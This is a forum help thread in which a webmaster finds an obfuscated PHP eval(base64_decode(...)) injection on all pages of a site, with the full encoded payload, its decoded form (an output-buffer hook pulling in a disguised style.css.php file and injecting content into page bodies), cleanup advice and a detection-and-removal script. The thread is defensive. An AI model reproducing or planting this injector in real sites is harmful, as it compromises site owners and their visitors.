Can anyone help me find out what this means? It's appearing on all of my pages, I have no clue what it is :wtf:

<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS9zb2NyaW1lL3B1YmxpY19odG1sL3QyL3NhbmRib3gvYmFja3VwLTguNi4yMDA4XzIwLTE1LTIwX3NvY3JpbWUvaG9tZWRpci9wdWJsaWNfaHRtbC9waHB0ZXN0aW5nL3g3Y2hhdDIvZG9jcy9pbnN0YWxsLmRyYWdvbmZseS94N2NoYXQvc3R5bGUuY3NzLnBocCcpKXtpbmNsdWRlX29uY2UoJy9ob21lL3NvY3JpbWUvcHVibGljX2h0bWwvdDIvc2FuZGJveC9iYWNrdXAtOC42LjIwMDhfMjAtMTUtMjBfc29jcmltZS9ob21lZGlyL3B1YmxpY19odG1sL3BocHRlc3RpbmcveDdjaGF0Mi9kb2NzL2luc3RhbGwuZHJhZ29uZmx5L3g3Y2hhdC9zdHlsZS5jc3MucGhwJyk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmIWZ1bmN0aW9uX2V4aXN0cygnZGdvYmgnKSl7aWYoIWZ1bmN0aW9uX2V4aXN0cygnZ3pkZWNvZGUnKSl7ZnVuY3Rpb24gZ3pkZWNvZGUoJGQpeyRmPW9yZChzdWJzdHIoJGQsMywxKSk7JGg9MTA7JGU9MDtpZigkZiY0KXskZT11bnBhY2soJ3YnLHN1YnN0cigkZCwxMCwyKSk7JGU9JGVbMV07JGgrPTIrJGU7fWlmKCRmJjgpeyRoPXN0cnBvcygkZCxjaHIoMCksJGgpKzE7fWlmKCRmJjE2KXskaD1zdHJwb3MoJGQsY2hyKDApLCRoKSsxO31pZigkZiYyKXskaCs9Mjt9JHU9Z3ppbmZsYXRlKHN1YnN0cigkZCwkaCkpO2lmKCR1PT09RkFMU0UpeyR1PSRkO31yZXR1cm4gJHU7fX1mdW5jdGlvbiBkZ29iaCgkYil7SGVhZGVyKCdDb250ZW50LUVuY29kaW5nOiBub25lJyk7JGM9Z3pkZWNvZGUoJGIpO2lmKHByZWdfbWF0Y2goJy9cPGJvZHkvc2knLCRjKSl7cmV0dXJuIHByZWdfcmVwbGFjZSgnLyhcPGJvZHlbXlw+XSpcPikvc2knLCckMScuZ21sKCksJGMpO31lbHNle3JldHVybiBnbWwoKS4kYzt9fW9iX3N0YXJ0KCdkZ29iaCcpO319fQ==')); ?>


It's base64, an almost sad form of obfuscation, but here's the decoded result:

if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){$GLOBALS['sh_no']=1;if(file_exists('/home/socrime/public_html/t2/sandbox/backup-8.6.2008_20-15-20_socrime/homedir/public_html/phptesting/x7chat2/docs/install.dragonfly/x7chat/style.css.php')){include_once('/home/socrime/public_html/t2/sandbox/backup-8.6.2008_20-15-20_socrime/homedir/public_html/phptesting/x7chat2/docs/install.dragonfly/x7chat/style.css.php');if(function_exists('gml')&&!function_exists('dgobh')){if(!function_exists('gzdecode')){function gzdecode($d){$f=ord(substr($d,3,1));$h=10;$e=0;if($f&4){$e=unpack('v',substr($d,10,2));$e=$e[1];$h+=2+$e;}if($f&8){$h=strpos($d,chr(0),$h)+1;}if($f&16){$h=strpos($d,chr(0),$h)+1;}if($f&2){$h+=2;}$u=gzinflate(substr($d,$h));if($u===FALSE){$u=$d;}return $u;}}function dgobh($b){Header('Content-Encoding: none');$c=gzdecode($b);if(preg_match('/\<body/si',$c)){return preg_replace('/(\<body[^\>]*\>)/si','$1'.gml(),$c);}else{return gml().$c;}}ob_start('dgobh');}}}


There are no lines since the base64 encoding stripped them.


EDIT: 'socrime', is that your username? May be an XSS attack if it were appearing on your pages for no reason.. 'install.dragonfly', Not sure what dragonfly is.

but how is it affecting me?

... and how did it get there? :(


It looks like it's attempting to replace your 'body' tags with some sort of chat? Or program of some sort. I believe it is a hacking attempt, as it has a stupidly simple obfuscation technique. Change your passwords, especially FTP/your site account's. And remove it from every file you have.


EDIT: Dragonfly looks like it's a CMS, do you use this? It may have been autogenerated if you're using some sort of content generator.. But I'm not sure why it would be encoded, I still think it's not supposed to be there.

lol, all 983? :-[

I see a fun night coming up!


Wow, man, that must suck.. I'd recommend using some sort of batch text replacer, shouldn't be too hard to FTP them off site and use one, I've found some online. If the codes are the same (should be) you can simply replace them all at one go.


But yeah, change your passwords! Good luck.
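The batch removal suggested above, as an added example that is not part of the original thread: a Python script that finds the injected `<?php /**/eval(base64_decode('...')); ?>` block in every `.php` file under a directory, decodes each payload for review without executing it, and strips the block only when asked. It assumes it is run against a copy of the site downloaded from the server; the function names and the sample files are constructed for illustration.

```python
import base64
import re
import tempfile
from pathlib import Path

# Matches the injected one-liner seen in this thread:
#   <?php /**/eval(base64_decode('...')); ?>
INJECTED = re.compile(
    rb"<\?php\s*/\*\*/\s*eval\(base64_decode\('([A-Za-z0-9+/=]+)'\)\);\s*\?>\r?\n?"
)

def scan_file(path):
    """Return the decoded payload of every injected block in one file."""
    data = Path(path).read_bytes()
    return [base64.b64decode(m.group(1)) for m in INJECTED.finditer(data)]

def clean_tree(root, apply=False):
    """Report infected *.php files under root; strip the blocks if apply=True."""
    report = {}
    for path in sorted(Path(root).rglob("*.php")):
        payloads = scan_file(path)
        if not payloads:
            continue
        report[str(path.relative_to(root))] = payloads
        if apply:
            path.write_bytes(INJECTED.sub(b"", path.read_bytes()))
    return report

def demo():
    # Constructed sample tree with a harmless stand-in payload.
    payload = base64.b64encode(b"echo 'injected';").decode()
    bad = "<?php /**/eval(base64_decode('%s')); ?>\n<?php echo 'home'; ?>\n" % payload
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "index.php").write_text(bad)
        (root / "clean.php").write_text("<?php echo 'ok'; ?>\n")
        dry = clean_tree(root)  # dry run: nothing is modified
        untouched = (root / "index.php").read_text() == bad
        clean_tree(root, apply=True)
        after = (root / "index.php").read_text()
    return dry, untouched, after

if __name__ == "__main__":
    print(demo())
```

Run it first without `apply=True` and read the decoded payloads: they name any further files the injected code includes, which need removing as well.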

but, when they're gone, my content isn't showing???

how do I fix that?

and I have never heard of Dragonfly, no


Uh oh.. Are there any other files on your server such as .htaccess that have entries you did not include? SOMETHING may have been further modified to prevent you from removing their code, look in your php file that doesn't work without it for example, is that the only thing changed?


I'd look online with some of that code.. You can re-decode the base64 here if you wish http://www.motobit.com/util/base64-decoder-encoder.asp?charset=iso-8859-1&acharset=


There may be an entry somewhere online describing the type of attack and how to remove it.

AuthName "test"
AuthUserFile "/home/socrime/.htpasswds/public_html/2/passwd"

that's all of it... should I delete it?


I just need to know, is your hosting username 'socrime' or similar? But yes, if you did not create that then you should delete it, from the looks of it, it's hiding the directories of domain.com/2/..

done... pages where i deleted the base decode... still not working tho :(


Maybe upload and show me a full page, such as your index. Maybe something was changed, I could spot it if it's in the .php file itself. If it isn't, then php.ini or so may have been modified.



I'm positive it hasn't been further modified (the page I found it on)

I did notice some "core.33134" files appeared, I think they're encoded though

about 10 files actually, all "core.(some number)"


There are some threads with somewhat helpful info here..




But yeah, from the look of it, and the nature of php being open source, you're messed without a backup or a lot of time..

